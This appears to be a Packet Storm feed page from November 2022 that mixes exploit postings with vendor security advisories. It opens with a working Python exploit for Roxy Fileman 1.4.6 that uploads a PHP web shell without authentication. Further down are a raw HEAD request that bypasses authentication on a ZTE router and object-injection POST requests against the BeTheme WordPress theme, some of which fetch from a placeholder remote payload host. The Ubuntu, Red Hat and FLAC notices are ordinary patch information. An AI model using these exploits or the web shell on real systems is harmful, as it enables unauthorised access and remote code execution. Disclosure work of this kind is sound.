Roxy Fileman versions 1.4.6 and below remote shell upload proof of concept exploit.

    # Exploit Title: Roxy Fileman <= 1.4.6 Arbitrary File Upload (Unathenticated)# Date: 11/12/2022# Exploit Author: Hadi Mene <hadi_mene@hotmail.com># Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20210126213412/https://roxyfileman.com/download.php?f=1.4.6-php# Version: <= 1.4.6# Tested on: Ubuntu 18.04 # CVE : CVE-2022-40797# https://nvd.nist.gov/vuln/detail/CVE-2022-40797 import requestsfrom optparse import OptionParserfrom os.path import basenamebanner =  '#################################################\n'banner += '# Roxy Fileman <= 1.4.6 Arbitrary File Upload   #\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\tCVE-2022-40797 exploit code\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#  Author : Hadi Mene <hadi_mene@hotmail.com>\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#################################################\n'parser = OptionParser()parser.add_option("-u", "--url", dest="url",                  help="url of roxy fileman installation")parser.add_option("-s", "--shell",dest="shell", default=False,                  help="path of the php shell if not specified defaut shell will be uploaded ")(options, args) = parser.parse_args()if options.url is None:  parser.error('URL is required use -h for help')url = options.url#It seems that in some versions of the app an '/' in the end of the url breaks the exploit codeif (url.endswith('/')):  url = url[:-1] # we delete that '/'  webroot = options.url.split('/')[3:]webroot = '/'+ '/'.join(webroot)if (webroot.endswith('/')):  webroot = webroot[:-1]  webroot = webroot+'/Uploads'if options.shell:  shell = open(options.shell,'r').read()  filename = basename(options.shell)  filename = filename.split('.')[0]  else:  # default shell  shell = "<?php system($_GET['cmd']); ?>"  filename = 'shell'headers = {    'Host': (url.split('/')[2]),    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',    'Accept': '*/*',    'Accept-Language': 'en-US,en;q=0.5',    'Content-Type': 'multipart/form-data; boundary=---------------------------39556237418830295983527604767',    'Origin': (url.split('/')[2]),    'Connection': 'close',}data = '-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="method"\r\n\r\najax\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="d"\r\n\r\n'+(webroot)+'\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="files[]"; filename="'+(filename)+'.phar"\r\nContent-Type: text/plain\r\n\r\n'+shell+'\n\r\n-----------------------------39556237418830295983527604767--\r\n'#We check if a file with the same filename is already there #because Roxy doesn't overwrite file instead it changes the filename of the newly uploaded fileif 'href="'+filename+'.phar"' in (requests.get(url+'/Uploads/').text):  already_uploaded = Trueelse:  already_uploaded = False  # file uploadreq = requests.post(url+'/php/upload.php', headers=headers, data=data, verify=False)response = (req.text)print(banner)if '{"res":"ok","msg":""}' in (response):# success  print('File Uploaded Successfully!!!')    if already_uploaded:    print('A file with the same filename is already on the server..')    print('URL: '+url+'/Uploads/'+(filename)+' - Copy X.phar ')      else:    print('URL: '+url+'/Uploads/'+(filename)+'.phar')else:  # failure  print('Shell Upload Failed :((( ')  print(response) #debug

Roxy Fileman 1.4.6 Remote Shell Upload

Ubuntu Security Notice 5733-1 - It was discovered that FLAC was not properly performing memory management operations, which could result in a memory leak. An attacker could possibly use this issue to cause FLAC to consume resources, leading to a denial of service. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM and Ubuntu 18.04 LTS. It was discovered that FLAC was not properly performing bounds checking operations when decoding data. If a user or automated system were tricked into processing a specially crafted file, an attacker could possibly use this issue to expose sensitive information or to cause FLAC to crash, leading to a denial of service. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-5733-1November 21, 2022flac vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in FLAC.Software Description:- flac: Free Lossless Audio CodecDetails:It was discovered that FLAC was not properly performing memory managementoperations, which could result in a memory leak. An attacker could possiblyuse this issue to cause FLAC to consume resources, leading to a denial ofservice. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM andUbuntu 18.04 LTS. (CVE-2017-6888)It was discovered that FLAC was not properly performing bounds checkingoperations when decoding data. If a user or automated system were trickedinto processing a specially crafted file, an attacker could possibly usethis issue to expose sensitive information or to cause FLAC to crash,leading to a denial of service. This issue only affected Ubuntu 14.04 ESM,Ubuntu 16.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. (CVE-2020-0499)It was discovered that FLAC was not properly performing bounds checkingoperations when encoding data. If a user or automated system were trickedinto processing a specially crafted file, an attacker could possibly usethis issue to expose sensitive information or to cause FLAC to crash,leading to a denial of service. (CVE-2021-0561)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   flac                            1.3.3-2ubuntu0.1   libflac++6v5                    1.3.3-2ubuntu0.1   libflac8                        1.3.3-2ubuntu0.1Ubuntu 20.04 LTS:   flac                            1.3.3-1ubuntu0.1   libflac++6v5                    1.3.3-1ubuntu0.1   libflac8                        1.3.3-1ubuntu0.1Ubuntu 18.04 LTS:   flac                            1.3.2-1ubuntu0.1   libflac++6v5                    1.3.2-1ubuntu0.1   libflac8                        1.3.2-1ubuntu0.1Ubuntu 16.04 ESM:   flac                            1.3.1-4ubuntu0.1~esm1   libflac++6v5                    1.3.1-4ubuntu0.1~esm1   libflac8                        1.3.1-4ubuntu0.1~esm1Ubuntu 14.04 ESM:   flac                            1.3.0-2ubuntu0.14.04.1+esm1   libflac++6                      1.3.0-2ubuntu0.14.04.1+esm1   libflac8                        1.3.0-2ubuntu0.14.04.1+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5733-1   CVE-2017-6888, CVE-2020-0499, CVE-2021-0561Package Information:   https://launchpad.net/ubuntu/+source/flac/1.3.3-2ubuntu0.1   https://launchpad.net/ubuntu/+source/flac/1.3.3-1ubuntu0.1   https://launchpad.net/ubuntu/+source/flac/1.3.2-1ubuntu0.1

Ubuntu Security Notice USN-5733-1

Boa Web Server versions 0.94.13 through 0.94.14 fail to validate the correct security constraint on the HEAD HTTP method allowing everyone to bypass the Basic Authorization mechanism.

    # Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://github.com/gpg/boa# CVE: N/A # Tested on: Debian 5.18.5Description :Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate thecorrect security constraint on the HEAD http method allowing everyoneto bypass the Basic Authorization Mechanism.Culprit :if (!memcmp(req->logline, "GET ", 4))req->method = M_GET;else if (!memcmp(req->logline, "HEAD ", 5))/* head is just get w/no body */req->method = M_HEAD;else if (!memcmp(req->logline, "POST ", 5))req->method = M_POST;else {log_error_doc(req);fprintf(stderr, "malformed request: \"%s\"\n", req->logline);send_r_not_implemented(req);return 0;}The req->method = M_HEAD; is being parsed directly  on the  response.cfile, looking at how the method is being implemented for one of theresponse codes :/* R_NOT_IMP: 505 */void send_r_bad_version(request * req){    SQUASH_KA(req);    req->response_status = R_BAD_VERSION;    if (!req->simple) {        req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");        print_http_headers(req);        req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminateheader */    }    if (req->method != M_HEAD) {        req_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }    req_flush(req);}Above code condition indicates that if (req->method != M_HEAD)  thereforeif the the requested method does not equal to M_HEAD thenreq_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }So if the method actually contains the http method of HEAD it's beingpassed  for every function that includes all the response code methods.

Boa Web Server 0.94.13 / 0.94.14 Authentication Bypass

This is a whitepaper along with a proof of concept eml file discussing CVE-2020-16947 where a remote code execution vulnerability exists in Microsoft Outlook 2019 version 16.0.13231.20262 when it fails to properly handle objects in memory.

Microsoft Outlook 2019 16.0.13231.20262 Remote Code Execution

This is a whitepaper along with a proof of concept eml file that demonstrates an out-of-bounds read on Outlook 2019 version 16.0.12624.20424. NIST references this issue as simply an information disclosure.

Microsoft Outlook 2019 16.0.12624.20424 Out-Of-Bounds Read

This is a whitepaper discussing CVE-2020-1349 where a remote code execution vulnerability exists in Microsoft Outlook 2019 version 16.0.12624.20424 when it fails to properly handle objects in memory.

Microsoft Outlook 2019 16.0.12624.20424 Remote Code Execution

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 suffers from an authentication bypass vulnerability when alternate HTTP methods are leveraged.

    # Exploit Title: Router ZTE-H108NS - Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# CVE: N/A # Tested on: Debian 5.18.5Description :When specific http methods are listed within a security constraint,then only thosemethods are protected. Router ZTE-H108NS defines the following httpmethods: GET, POST, and HEAD. HEAD method seems to fall under a flawedoperation which allows the HEAD to be implemented correctly with everyResponse Status Code.Proof Of Concept :Below request bypasses successfully the Basic Authentication, andgrants access to the Administration Panel of the Router.HEAD /cgi-bin/tools_admin.asp  HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: SESSIONID=1cd6bb77Upgrade-Insecure-Requests: 1Cache-Control: max-age=0

ZTE ZXHN-H108NS Authentication Bypass

Red Hat Security Advisory 2022-8543-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8543-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8543  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405   
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409   
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412   
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420   
                   CVE-2022-45421   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3t1TtzjgjWX9erEAQhIpxAApVjEoEzG951crtCuv4E3JMwPoJoF3ONp  
th3oy4c2rt5Gf7WzY6qBqtwmPiN8yYHhuSxWTJvynwiUDqjPM4vWngedRCjqLwbe  
mPXKj4NCSUXQcNAHIk764UqGozB9iz7K4hl6rTjGnVQc77UiEBKppviNNyojxZiJ  
KYFDGL4gAG7zNVXcok/EP/ip1HT9M13NmV2C9eJBwxEWdHBklXs7e91iKFUjuvtC  
NPlcMX9dgHLlbEoFEqYZgvJX7tYfzmY8HMRY3Rylr8awdg//WNMx7W+Ft8DE7xJq  
o+MugHOuQ9p+uLeVCPm4eZWAJIPJXRuAlo2RxQDOsyqjfZYAXOBsHOkIk0bg/8s/  
MSieS1tfwNyr5YdxqHTyv3T6PmUN1ogfOwe4PB9k5ieZVPdGOd/2oSZyZWvpE190  
syxBuMXGddWfmf7i9LqTA6KLnMXJqh8afL6J4MPs7NnYfQ4aWaoyR2B6NMoVU5NW  
VHnWsL113akxAThF8HHt3j0+GclcW7Dr0FKOZSe5TD0EsPE++mYJaAL/sWv7sejK  
cFnWiTSRMbvmPz7/DHv/uB6+aVDFotnjiIzzWa1YsrBhZh2SlPxa9rOEdQ3gJQlD  
MBt/MBfwbaD0zbD5Y2rSzCD5MAHWXSf8mWiuVn1ZZ0vH13kkplNPIHxcP5GC+0Yd  
qlDTRrHRDmY=  
=bM1x  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8543-01

Ubuntu Security Notice 5729-2 - It was discovered that a race condition existed in the instruction emulator of the Linux kernel on Arm 64-bit systems. A local attacker could use this to cause a denial of service. Hsin-Wei Hung discovered that the BPF subsystem in the Linux kernel contained an out-of-bounds read vulnerability in the x86 JIT compiler. A local attacker could possibly use this to cause a denial of service or expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5729-2  
November 18, 2022

linux-gcp-5.15, linux-gke-5.15, linux-intel-iotg, linux-raspi  
vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gke-5.15: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that a race condition existed in the instruction emulator  
of the Linux kernel on Arm 64-bit systems. A local attacker could use this  
to cause a denial of service (system crash). (CVE-2022-20422)

Hsin-Wei Hung discovered that the BPF subsystem in the Linux kernel  
contained an out-of-bounds read vulnerability in the x86 JIT compiler. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or expose sensitive information (kernel memory). (CVE-2022-2905)

Hao Sun and Jiacheng Xu discovered that the NILFS file system  
implementation in the Linux kernel contained a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-2978)

Abhishek Shah discovered a race condition in the PF_KEYv2 implementation in  
the Linux kernel. A local attacker could use this to cause a denial of  
service (system crash) or possibly expose sensitive information (kernel  
memory). (CVE-2022-3028)

It was discovered that the Netlink device interface implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability with some network device drivers. A local  
attacker with admin access to the network device could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-3625)

It was discovered that the IDT 77252 ATM PCI device driver in the Linux  
kernel did not properly remove any pending timers during device exit,  
resulting in a use-after-free vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-3635)

Gwangun Jung discovered that the netfilter subsystem in the Linux kernel  
did not properly prevent binding to an already bound chain. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-39190)

Xingyuan Mo and Gengjia Chen discovered that the Promise SuperTrak EX  
storage controller driver in the Linux kernel did not properly handle  
certain structures. A local attacker could potentially use this to expose  
sensitive information (kernel memory). (CVE-2022-40768)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  linux-image-5.15.0-1018-intel-iotg  5.15.0-1018.23  
  linux-image-5.15.0-1018-raspi   5.15.0-1018.20  
  linux-image-5.15.0-1018-raspi-nolpae  5.15.0-1018.20  
  linux-image-intel-iotg          5.15.0.1018.19  
  linux-image-raspi               5.15.0.1018.17  
  linux-image-raspi-nolpae        5.15.0.1018.17

Ubuntu 20.04 LTS:  
  linux-image-5.15.0-1020-gke     5.15.0-1020.25~20.04.1  
  linux-image-5.15.0-1022-gcp     5.15.0-1022.29~20.04.1  
  linux-image-gcp                 5.15.0.1022.29~20.04.1  
  linux-image-gke-5.15            5.15.0.1020.25~20.04.1

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5729-2  
  https://ubuntu.com/security/notices/USN-5729-1  
  CVE-2022-20422, CVE-2022-2905, CVE-2022-2978, CVE-2022-3028,  
  CVE-2022-3625, CVE-2022-3635, CVE-2022-39190, CVE-2022-40768

Package Information:  
  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1018.23  
  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1018.20  
  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1022.29~20.04.1  
  https://launchpad.net/ubuntu/+source/linux-gke-5.15/5.15.0-1020.25~20.04.1

Ubuntu Security Notice USN-5729-2

WordPress BeTheme theme version 26.5.1.4 suffers from multiple PHP object injection vulnerabilities when processing input.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Betheme  
Vendor URL:     https://muffingroup.com/betheme/  
Type:           Deserialization of Untrusted Data [CWE-502]  
Date found:     2022-11-02  
Date published: 2022-11-18  
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE:            CVE-2022-3861

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme 26.5.1.4 and below

4. INTRODUCTION  
===============  
Ever since Betheme was just an idea, we knew that it would be different from all  
other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could  
easily adapt to any project you need to work on without writing any code. A theme  
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress theme is vulnerable to multiple PHP Object injections when processing  
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter  
-mfn_builder_import_page -> "mfn-items-import-page" parameter  
-importdata -> "import" parameter  
-importsinglepage -> "import" parameter  
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at  
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT  
===================  
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 75  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 114  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 83  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION  
===========  
Update to version 26.6

8. REPORT TIMELINE  
==================  
2022-11-01: Discovery of the vulnerability  
2022-11-03: CVE requested from Wordfence (CNA)  
2022-11-04: Wordfence assigns CVE-2022-3861  
2022-11-08: Vendor notification  
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond  
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability  
2022-11-18: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

Source

Packet Storm